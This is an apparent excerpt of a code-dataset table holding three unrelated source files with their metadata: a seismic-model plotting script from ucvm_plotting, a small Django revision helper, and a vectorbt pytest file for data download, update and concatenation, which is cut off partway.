| 4,705
| 17,682
| 38.193199
| 0.804922
| 0.147764
| 0
| 0.765383
| 1
| 0.000303
| 0.132752
| 0.123734
| 0
| 0
| 0
| 0
| 0.022128
| 1
| 0.086087
| false
| 0.000909
| 0.004547
| 0
| 0.190058
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
35b51f320b9d2ab7462f870092016faf67fc75bd
| 2,332
|
py
|
Python
|
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | null | null | null |
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | 4
|
2021-11-30T08:28:42.000Z
|
2022-03-07T21:27:14.000Z
|
examples/mix_plots/make_scatter_plots.py
|
SCECcode/ucvm_plotting
|
0fad66043c81bdc5e616f87020f38177bdae9503
|
[
"BSD-3-Clause"
] | 1
|
2021-06-05T03:28:51.000Z
|
2021-06-05T03:28:51.000Z
|
#!/usr/bin/env python
import sys
import os
#
# 0 depth
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 0.0 -c cencal,cca,cvmsi -o norcal_map_grid_0.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./norcal_map_grid_0.txt -e 0.0 -n \"CS18.4 Vp Density Scatter Plot 0k\" -o nocal_vp_versus_density_0km.png"
os.system(cmd)
print(cmd)
#
# Test the overall density vs vp
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cencal,cca,cvmsi -o norcal_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./norcal_map_grid_1000.txt -n \"CS18.5 Vp Density Scatter Plot 1000km\" -o nocal_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
#
# Test the density rule for cencal
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cencal -o cencal_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./cencal_map_grid_1000.txt -e 1000.0 -n cencal_map_grid_1000_km -o cencal_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
#
# Test the density rule for cca
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cca -o cca_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./cca_map_grid_1000.txt -e 1000.0 -n cca_map_grid_0_km -o cca_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
#
# Test the density rule for cvms5
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cvms5 -o cvms5_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./cvms5_map_grid_1000.txt -e 1000.0 -n cvms5_map_grid_0_km -o cvms5_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
#
# Test the density rule for cvmsi
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cvmsi -o cvmsi_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./cvmsi_map_grid_1000.txt -e 1000.0 -n cvmsi_map_grid_0_km -o cvmsi_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
#
# Test the density rule for cvmh
cmd="makemapgrid.py -b 30.5,-126.0 -u 42.5,-112.5 -s 1.00 -e 1000.0 -c cvmh -o cvmh_map_grid_1000.txt"
os.system(cmd)
print(cmd)
cmd="plot_scatter_plot.py -i ./cvmh_map_grid_1000.txt -e 1000.0 -n cvmh_map_grid_1000_km -o cvmh_vp_versus_density_1000km.png"
os.system(cmd)
print(cmd)
sys.exit(0)
| 31.945205
| 140
| 0.734991
| 502
| 2,332
| 3.207171
| 0.11753
| 0.082609
| 0.095652
| 0.13913
| 0.862112
| 0.771429
| 0.771429
| 0.771429
| 0.688199
| 0.660248
| 0
| 0.137646
| 0.118353
| 2,332
| 72
| 141
| 32.388889
| 0.645428
| 0.093482
| 0
| 0.622222
| 0
| 0.266667
| 0.715102
| 0.289185
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.044444
| 0
| 0.044444
| 0.311111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea7bd18bdf960d9d225de6fc86f64617e8327661
| 192
|
py
|
Python
|
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
github_revision/backends.py
|
watchdogpolska/django-github-revision
|
e0c216f6a16f2336f17306e8d6820eddcecab746
|
[
"MIT"
] | null | null | null |
from dealer.auto import auto as dealer_auto
from django.conf import settings
def dealer():
return dealer_auto.revision
def auto():
return getattr(settings, 'REVISION_ID', dealer())
| 19.2
| 53
| 0.75
| 27
| 192
| 5.222222
| 0.481481
| 0.212766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161458
| 192
| 10
| 53
| 19.2
| 0.875776
| 0
| 0
| 0
| 0
| 0
| 0.056995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
57690d6157014b1e34d98d59644bbf068d352a85
| 38,264
|
py
|
Python
|
tests/test_data.py
|
emiliobasualdo/vectorbt
|
b538dc67e2b027110694d4876d4aa723c1b929dc
|
[
"Apache-2.0"
] | 1
|
2021-03-28T23:59:08.000Z
|
2021-03-28T23:59:08.000Z
|
tests/test_data.py
|
dougransom/vectorbt
|
44968ac579a1420f713df326eb730bae93041622
|
[
"Apache-2.0"
] | null | null | null |
tests/test_data.py
|
dougransom/vectorbt
|
44968ac579a1420f713df326eb730bae93041622
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pandas as pd
from datetime import datetime, timedelta
import pytest
import vectorbt as vbt
from vectorbt.utils.config import merge_dicts
seed = 42
# ############# base.py ############# #
class MyData(vbt.Data):
@classmethod
def download_symbol(cls, symbol, shape=(5, 3), start_date=datetime(2020, 1, 1), columns=None, index_mask=None,
column_mask=None, return_arr=False, tz_localize=None, seed=seed):
np.random.seed(seed)
a = np.random.uniform(size=shape) + symbol
if return_arr:
return a
index = [start_date + timedelta(days=i) for i in range(a.shape[0])]
if a.ndim == 1:
sr = pd.Series(a, index=index, name=columns)
if index_mask is not None:
sr = sr.loc[index_mask]
if tz_localize is not None:
sr = sr.tz_localize(tz_localize)
return sr
df = pd.DataFrame(a, index=index, columns=columns)
if index_mask is not None:
df = df.loc[index_mask]
if column_mask is not None:
df = df.loc[:, column_mask]
if tz_localize is not None:
df = df.tz_localize(tz_localize)
return df
def update_symbol(self, symbol, n=1, **kwargs):
download_kwargs = self.select_symbol_kwargs(symbol, self.download_kwargs)
download_kwargs['start_date'] = self.data[symbol].index[-1]
shape = download_kwargs.pop('shape', (5, 3))
new_shape = (n, shape[1]) if len(shape) > 1 else (n,)
new_seed = download_kwargs.pop('seed', seed) + 1
kwargs = merge_dicts(download_kwargs, kwargs)
return self.download_symbol(symbol, shape=new_shape, seed=new_seed, **kwargs)
class TestData:
def test_config(self, tmp_path):
data = MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2'])
assert MyData.loads(data.dumps()) == data
data.save(tmp_path / 'data')
assert MyData.load(tmp_path / 'data') == data
def test_download(self):
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), return_arr=True).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
]
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3), return_arr=True).data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
]
)
)
index = pd.DatetimeIndex(
['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
dtype='datetime64[ns]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,)).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), columns='feat0').data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index,
name='feat0'
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3)).data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
],
index=index,
columns=pd.Index(['feat0', 'feat1', 'feat2'], dtype='object'))
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,)).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,)).data[1],
pd.Series(
[
1.3745401188473625,
1.9507143064099162,
1.7319939418114051,
1.5986584841970366,
1.15601864044243652
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3)).data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3)).data[1],
pd.DataFrame(
[
[1.3745401188473625, 1.9507143064099162, 1.7319939418114051],
[1.5986584841970366, 1.15601864044243652, 1.15599452033620265],
[1.05808361216819946, 1.8661761457749352, 1.6011150117432088],
[1.7080725777960455, 1.020584494295802447, 1.9699098521619943],
[1.8324426408004217, 1.21233911067827616, 1.18182496720710062]
],
index=index
)
)
tzaware_index = pd.DatetimeIndex(
[
'2020-01-01 01:00:00',
'2020-01-02 01:00:00',
'2020-01-03 01:00:00',
'2020-01-04 01:00:00',
'2020-01-05 01:00:00'
],
dtype='datetime64[ns, Europe/Berlin]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), tz_localize='UTC', tz_convert='Europe/Berlin').data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=tzaware_index
)
)
index_mask = vbt.symbol_dict({
0: [False, True, True, True, True],
1: [True, True, True, True, False]
})
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan').data[0],
pd.Series(
[
np.nan,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan').data[1],
pd.Series(
[
1.3745401188473625,
1.9507143064099162,
1.7319939418114051,
1.5986584841970366,
np.nan
],
index=index
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop').data[0],
pd.Series(
[
0.9507143064099162,
0.7319939418114051,
0.5986584841970366
],
index=index[1:4]
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop').data[1],
pd.Series(
[
1.9507143064099162,
1.7319939418114051,
1.5986584841970366
],
index=index[1:4]
)
)
column_mask = vbt.symbol_dict({
0: [False, True, True],
1: [True, True, False]
})
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan').data[0],
pd.DataFrame(
[
[np.nan, np.nan, np.nan],
[np.nan, 0.15601864044243652, 0.15599452033620265],
[np.nan, 0.8661761457749352, 0.6011150117432088],
[np.nan, 0.020584494295802447, 0.9699098521619943],
[np.nan, 0.21233911067827616, 0.18182496720710062]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan').data[1],
pd.DataFrame(
[
[1.3745401188473625, 1.9507143064099162, np.nan],
[1.5986584841970366, 1.15601864044243652, np.nan],
[1.05808361216819946, 1.8661761457749352, np.nan],
[1.7080725777960455, 1.020584494295802447, np.nan],
[np.nan, np.nan, np.nan]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop').data[0],
pd.DataFrame(
[
[0.15601864044243652],
[0.8661761457749352],
[0.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop').data[1],
pd.DataFrame(
[
[1.15601864044243652],
[1.8661761457749352],
[1.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
with pytest.raises(Exception) as e_info:
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='raise', missing_columns='nan')
with pytest.raises(Exception) as e_info:
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='raise')
with pytest.raises(Exception) as e_info:
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='test', missing_columns='nan')
with pytest.raises(Exception) as e_info:
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='test')
def test_update(self):
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), return_arr=True).update().data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896
]
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), return_arr=True).update(n=2).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896,
0.6090665392794814
]
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3), return_arr=True).update().data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.11505456638977896, 0.6090665392794814, 0.13339096418598828]
]
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3), return_arr=True).update(n=2).data[0],
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.11505456638977896, 0.6090665392794814, 0.13339096418598828],
[0.24058961996534878, 0.3271390558111398, 0.8591374909485977]
]
)
)
index = pd.DatetimeIndex(
['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
dtype='datetime64[ns]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,)).update().data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896
],
index=index
)
)
index2 = pd.DatetimeIndex(
['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05', '2020-01-06'],
dtype='datetime64[ns]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,)).update(n=2).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896,
0.6090665392794814
],
index=index2
)
)
tzaware_index = pd.DatetimeIndex(
[
'2020-01-01 01:00:00',
'2020-01-02 01:00:00',
'2020-01-03 01:00:00',
'2020-01-04 01:00:00',
'2020-01-05 01:00:00'
],
dtype='datetime64[ns, Europe/Berlin]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), tz_localize='UTC', tz_convert='Europe/Berlin')
.update(tz_localize=None).data[0],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896
],
index=tzaware_index
)
)
index_mask = vbt.symbol_dict({
0: [False, True, True, True, True],
1: [True, True, True, True, False]
})
update_index_mask = vbt.symbol_dict({
0: [True],
1: [False]
})
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
.update(index_mask=update_index_mask).data[0],
pd.Series(
[
np.nan,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896
],
index=index
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
.update(index_mask=update_index_mask).data[1],
pd.Series(
[
1.3745401188473625,
1.9507143064099162,
1.7319939418114051,
1.5986584841970366,
np.nan
],
index=index
)
)
update_index_mask2 = vbt.symbol_dict({
0: [True, False],
1: [False, True]
})
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
.update(n=2, index_mask=update_index_mask2).data[0],
pd.Series(
[
np.nan,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.11505456638977896,
np.nan
],
index=index2
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='nan')
.update(n=2, index_mask=update_index_mask2).data[1],
pd.Series(
[
1.3745401188473625,
1.9507143064099162,
1.7319939418114051,
1.5986584841970366,
np.nan,
1.6090665392794814
],
index=index2
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
.update(index_mask=update_index_mask).data[0],
pd.Series(
[
0.9507143064099162,
0.7319939418114051,
0.5986584841970366
],
index=index[1:4]
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
.update(index_mask=update_index_mask).data[1],
pd.Series(
[
1.9507143064099162,
1.7319939418114051,
1.5986584841970366
],
index=index[1:4]
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
.update(n=2, index_mask=update_index_mask2).data[0],
pd.Series(
[
0.9507143064099162,
0.7319939418114051,
0.5986584841970366
],
index=index[1:4]
)
)
pd.testing.assert_series_equal(
MyData.download([0, 1], shape=(5,), index_mask=index_mask, missing_index='drop')
.update(n=2, index_mask=update_index_mask2).data[1],
pd.Series(
[
1.9507143064099162,
1.7319939418114051,
1.5986584841970366
],
index=index[1:4]
)
)
column_mask = vbt.symbol_dict({
0: [False, True, True],
1: [True, True, False]
})
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan')
.update(index_mask=update_index_mask).data[0],
pd.DataFrame(
[
[np.nan, np.nan, np.nan],
[np.nan, 0.15601864044243652, 0.15599452033620265],
[np.nan, 0.8661761457749352, 0.6011150117432088],
[np.nan, 0.020584494295802447, 0.9699098521619943],
[np.nan, 0.6090665392794814, 0.13339096418598828]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan')
.update(index_mask=update_index_mask).data[1],
pd.DataFrame(
[
[1.3745401188473625, 1.9507143064099162, np.nan],
[1.5986584841970366, 1.15601864044243652, np.nan],
[1.05808361216819946, 1.8661761457749352, np.nan],
[1.7080725777960455, 1.020584494295802447, np.nan],
[np.nan, np.nan, np.nan]
],
index=index
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan')
.update(n=2, index_mask=update_index_mask2).data[0],
pd.DataFrame(
[
[np.nan, np.nan, np.nan],
[np.nan, 0.15601864044243652, 0.15599452033620265],
[np.nan, 0.8661761457749352, 0.6011150117432088],
[np.nan, 0.020584494295802447, 0.9699098521619943],
[np.nan, 0.6090665392794814, 0.13339096418598828],
[np.nan, np.nan, np.nan]
],
index=index2
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='nan', missing_columns='nan')
.update(n=2, index_mask=update_index_mask2).data[1],
pd.DataFrame(
[
[1.3745401188473625, 1.9507143064099162, np.nan],
[1.5986584841970366, 1.15601864044243652, np.nan],
[1.05808361216819946, 1.8661761457749352, np.nan],
[1.7080725777960455, 1.020584494295802447, np.nan],
[np.nan, np.nan, np.nan],
[1.2405896199653488, 1.3271390558111398, np.nan]
],
index=index2
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop')
.update(index_mask=update_index_mask).data[0],
pd.DataFrame(
[
[0.15601864044243652],
[0.8661761457749352],
[0.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop')
.update(index_mask=update_index_mask).data[1],
pd.DataFrame(
[
[1.15601864044243652],
[1.8661761457749352],
[1.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop')
.update(n=2, index_mask=update_index_mask2).data[0],
pd.DataFrame(
[
[0.15601864044243652],
[0.8661761457749352],
[0.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), index_mask=index_mask, column_mask=column_mask,
missing_index='drop', missing_columns='drop')
.update(n=2, index_mask=update_index_mask2).data[1],
pd.DataFrame(
[
[1.15601864044243652],
[1.8661761457749352],
[1.020584494295802447]
],
index=index[1:4],
columns=pd.Int64Index([1], dtype='int64')
)
)
def test_concat(self):
index = pd.DatetimeIndex(
['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
dtype='datetime64[ns]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), columns='feat0').concat()['feat0'],
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index,
name=0
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5,), columns='feat0').concat()['feat0'],
pd.DataFrame(
[
[0.3745401188473625, 1.3745401188473625],
[0.9507143064099162, 1.9507143064099162],
[0.7319939418114051, 1.7319939418114051],
[0.5986584841970366, 1.5986584841970366],
[0.15601864044243652, 1.15601864044243652]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat0'],
pd.Series(
[
0.3745401188473625,
0.5986584841970366,
0.05808361216819946,
0.7080725777960455,
0.8324426408004217
],
index=index,
name=0
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat1'],
pd.Series(
[
0.9507143064099162,
0.15601864044243652,
0.8661761457749352,
0.020584494295802447,
0.21233911067827616
],
index=index,
name=0
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat2'],
pd.Series(
[
0.7319939418114051,
0.15599452033620265,
0.6011150117432088,
0.9699098521619943,
0.18182496720710062
],
index=index,
name=0
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat0'],
pd.DataFrame(
[
[0.3745401188473625, 1.3745401188473625],
[0.5986584841970366, 1.5986584841970366],
[0.05808361216819946, 1.05808361216819946],
[0.7080725777960455, 1.7080725777960455],
[0.8324426408004217, 1.8324426408004217]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat1'],
pd.DataFrame(
[
[0.9507143064099162, 1.9507143064099162],
[0.15601864044243652, 1.15601864044243652],
[0.8661761457749352, 1.8661761457749352],
[0.020584494295802447, 1.020584494295802447],
[0.21233911067827616, 1.21233911067827616]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).concat()['feat2'],
pd.DataFrame(
[
[0.7319939418114051, 1.7319939418114051],
[0.15599452033620265, 1.15599452033620265],
[0.6011150117432088, 1.6011150117432088],
[0.9699098521619943, 1.9699098521619943],
[0.18182496720710062, 1.18182496720710062]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
def test_get(self):
index = pd.DatetimeIndex(
['2020-01-01', '2020-01-02', '2020-01-03', '2020-01-04', '2020-01-05'],
dtype='datetime64[ns]',
freq='D'
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5,), columns='feat0').get(),
pd.Series(
[
0.3745401188473625,
0.9507143064099162,
0.7319939418114051,
0.5986584841970366,
0.15601864044243652
],
index=index,
name='feat0'
)
)
pd.testing.assert_frame_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get(),
pd.DataFrame(
[
[0.3745401188473625, 0.9507143064099162, 0.7319939418114051],
[0.5986584841970366, 0.15601864044243652, 0.15599452033620265],
[0.05808361216819946, 0.8661761457749352, 0.6011150117432088],
[0.7080725777960455, 0.020584494295802447, 0.9699098521619943],
[0.8324426408004217, 0.21233911067827616, 0.18182496720710062]
],
index=index,
columns=pd.Index(['feat0', 'feat1', 'feat2'], dtype='object')
)
)
pd.testing.assert_series_equal(
MyData.download(0, shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get('feat0'),
pd.Series(
[
0.3745401188473625,
0.5986584841970366,
0.05808361216819946,
0.7080725777960455,
0.8324426408004217
],
index=index,
name='feat0'
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5,), columns='feat0').get(),
pd.DataFrame(
[
[0.3745401188473625, 1.3745401188473625],
[0.9507143064099162, 1.9507143064099162],
[0.7319939418114051, 1.7319939418114051],
[0.5986584841970366, 1.5986584841970366],
[0.15601864044243652, 1.15601864044243652]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get('feat0'),
pd.DataFrame(
[
[0.3745401188473625, 1.3745401188473625],
[0.5986584841970366, 1.5986584841970366],
[0.05808361216819946, 1.05808361216819946],
[0.7080725777960455, 1.7080725777960455],
[0.8324426408004217, 1.8324426408004217]
],
index=index,
columns=pd.Int64Index([0, 1], dtype='int64', name='symbol')
)
)
pd.testing.assert_frame_equal(
MyData.download([0, 1], shape=(5, 3), columns=['feat0', 'feat1', 'feat2']).get(['feat0', 'feat1'])[0],
pd.DataFrame(
[
